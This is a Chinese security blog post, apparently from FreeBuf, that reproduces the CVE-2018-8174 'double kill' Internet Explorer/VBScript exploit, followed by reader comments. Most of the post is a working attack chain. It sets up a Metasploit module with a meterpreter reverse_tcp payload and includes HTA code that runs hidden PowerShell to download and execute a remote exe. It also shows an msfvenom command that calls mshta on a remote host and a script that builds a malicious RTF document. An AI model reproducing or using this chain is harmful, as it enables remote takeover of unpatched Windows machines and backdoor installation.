CVE-2018-8174 “双杀”0day漏洞复现 - 好文

最近360核心安全事业部高级威胁应对团队在全球范围内率先监控到了一例使用0day漏洞的APT攻击，捕获到了全球首例利用浏览器
0day漏洞的新型Office文档攻击，我们将该漏洞命名为“双杀”漏洞。该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招，最终被黑客植入后门木马完全控制电脑。

了解更多 http://www.freebuf.com/articles/paper/171254.html
<http://www.freebuf.com/articles/paper/171254.html>

POC验证

未打补丁系统，IE浏览器打开此地址会弹出计算器。

http://test.lr3800.com/CVE-2018-8174_PoC.html
<http://test.lr3800.com/CVE-2018-8174_PoC.html>

<http://image.3001.net/images/20180604/15281226592968.png>

metasploit 复现

下载 metasploit 模块到本地
git clone https://github.com/0x09AL/CVE-2018-8174-msf.git
将CVE-2018-8174.rb复制到 fileformat 目录
cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows
/fileformat/
将CVE-2018-8174.rtf复制到 exploits 目录
cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/
启动 metasploit
use exploit/windows/fileformat/CVE-2018-8174 set PAYLOAD
windows/meterpreter/reverse_tcpset srvhost 192.168.0.116 set lhost 192.168.0.116
exploit
<http://image.3001.net/images/20180604/15281226764863.png>复制
/root/.msf4/local/目录中的 msf.rtf 文件到目标主机上使用word文档打开
或者IE浏览器打开 http://192.168.0.116:8080 <http://192.168.0.116:8080> 即可获得会话

自定义下载者复现

利用 mshta 从远程服务器下载文件执行。

请先下载poc附件，下文中使用链接：https://pan.baidu.com/s/14vP4CMdjEKkRdHBb7vLSHg
<https://pan.baidu.com/s/14vP4CMdjEKkRdHBb7vLSHg> 密码：ci8h

1.构造HTA文件，当访问hta文件就会触发powershell下载文件至临时目录执行

准备你的xx.exe文件上传至站点目录，假如得到地址 http://xxx.com/xxx.exe <http://xxx.com/xxx.exe>

<http://image.3001.net/images/20180604/15281226954786.png>HTA代码：
<script> a=new ActiveXObject("WScript.Shell"); a.run(
'%SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe -windowstyle
hidden (new-object
System.Net.WebClient).DownloadFile(\'http://xxx.com/xxx.exe\',
\'c:/windows/temp/xxx.exe\'); c:/windows/temp/xxx.exe', 0);window.close(); </
script>
把该文件命名 8174.hta 上传至站点目录；假如得到地址 http://xxx.lr3800.com/8174.hta
<http://xxx.lr3800.com/8174.hta>

2.使用msfvenom生成 js Shellcode

msfvenom -p windows/exec cmd='mshta http://xxx.lr3800.com/8174.hta' -f js_le
exitfunc=thread-a x86
<http://image.3001.net/images/20180604/15281227423616.png>把生成的Shellcode字符替换至
8174poc.html 166行代码

把 8174poc.html 文件上传至站点目录假如得到地址 http://xxx.lr3800.com/8174poc.html
<http://xxx.lr3800.com/8174poc.html>

3.生成Word文档

* 下载python脚本保存本地
git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
运行 CVE-2018-8174.py
python CVE-2018-8174.py -u http://xxx.lr3800.com/8174poc.html -o exp.rtf
得到目录中的 “exp.rtf ”文件，使用Word文档打开即可下载执行xx.exe文件，或者IE浏览器打开
http://xxx.lr3800.com/8174poc.html <http://xxx.lr3800.com/8174poc.html>
即可下载执行xx.exe文件

样本演示运行效果 https://app.any.run/tasks/3c52b2b2-3fb7-42ff-a3bf-14429b17b112
<https://app.any.run/tasks/3c52b2b2-3fb7-42ff-a3bf-14429b17b112>
<http://www.freebuf.com/author/lr3800_> lr3800_
<http://www.freebuf.com/author/lr3800_> 6 篇文章等级： 4级 <> | |
* 上一篇：Pwn2Own华为HiApp漏洞原理与利用分析（下） <http://www.freebuf.com/vuls/173921.html>
* 下一篇：腾讯御见捕获Flash 0day漏洞（CVE-2018-5002）野外攻击
<http://www.freebuf.com/vuls/174185.html>
这些评论亮了

* 不当大哥很多年回复 <http://www.freebuf.com/vuls/173727.html?replytocom=#respond>
周六还发文章，肯定没有女朋友。 )9( 亮了 <> 发表评论 <http://www.freebuf.com/vuls/173727.html#respond>
已有 8 条评论

* 不当大哥很多年 2018-06-09 回复
<http://www.freebuf.com/vuls/173727.html?replytocom=250650#respond> 1楼
周六还发文章，肯定没有女朋友。
亮了 <>(8)
* 安安全全狗狗 2018-06-09 回复
<http://www.freebuf.com/vuls/173727.html?replytocom=250660#respond>
@ 不当大哥很多年周六还看文章你也没有女朋友
亮了 <>(1)
*
<http://www.freebuf.com/author/%E8%8B%A5%E4%B8%BA%E8%87%AA%E7%94%B1%E6%95%85%E4%BA%8C%E8%80%85%E7%9A%86%E5%8F%AF%E6%8A%9B>
若为自由故二者皆可抛
<http://www.freebuf.com/author/%E8%8B%A5%E4%B8%BA%E8%87%AA%E7%94%B1%E6%95%85%E4%BA%8C%E8%80%85%E7%9A%86%E5%8F%AF%E6%8A%9B>
(1级) 这家伙太懒了，还未填写个人描述！ 2018-06-09 回复
<http://www.freebuf.com/vuls/173727.html?replytocom=250654#respond> 2楼
我想问一下，刚才我点了一下那个网址，应该没事吧，不会已经中招了吧
亮了 <>(1)
* <http://www.freebuf.com/author/lr3800_> lr3800_
<http://www.freebuf.com/author/lr3800_> (4级) 安全猎人 lr3800.com 2018-06-09 回复
<http://www.freebuf.com/vuls/173727.html?replytocom=250664#respond> 3楼
@ 不当大哥很多年你找到我的漏洞了，我想尽快找个女票打补丁
亮了 <>(0)
* <http://www.freebuf.com/author/cwg2552298> cwg2552298
<http://www.freebuf.com/author/cwg2552298> (6级) Follow my own course 2018-06-10
回复 <http://www.freebuf.com/vuls/173727.html?replytocom=250670#respond> 4楼
我被弹计算器了
亮了 <>(0)
* 1521815837 2018-06-10 回复
<http://www.freebuf.com/vuls/173727.html?replytocom=250671#respond> 5楼
那种系统没有office wps的飘过
亮了 <>(0)
* <http://www.freebuf.com/author/houjingyi> houjingyi
<http://www.freebuf.com/author/houjingyi> (3级) 2018-06-10 回复
<http://www.freebuf.com/vuls/173727.html?replytocom=250677#respond> 6楼
天天发这些复现的有什么意义，教大家metasploit的使用么？我一天能写100篇出来。
亮了 <>(0)
* <http://www.freebuf.com/author/lr3800_> lr3800_
<http://www.freebuf.com/author/lr3800_> (4级) 安全猎人 lr3800.com 2018-06-10 回复
<http://www.freebuf.com/vuls/173727.html?replytocom=250680#respond>
@ houjingyi 键盘侠，来来来，你每天写100篇。你可以选择不看，直接关闭该页面。
亮了 <>(0)

热门工具换一换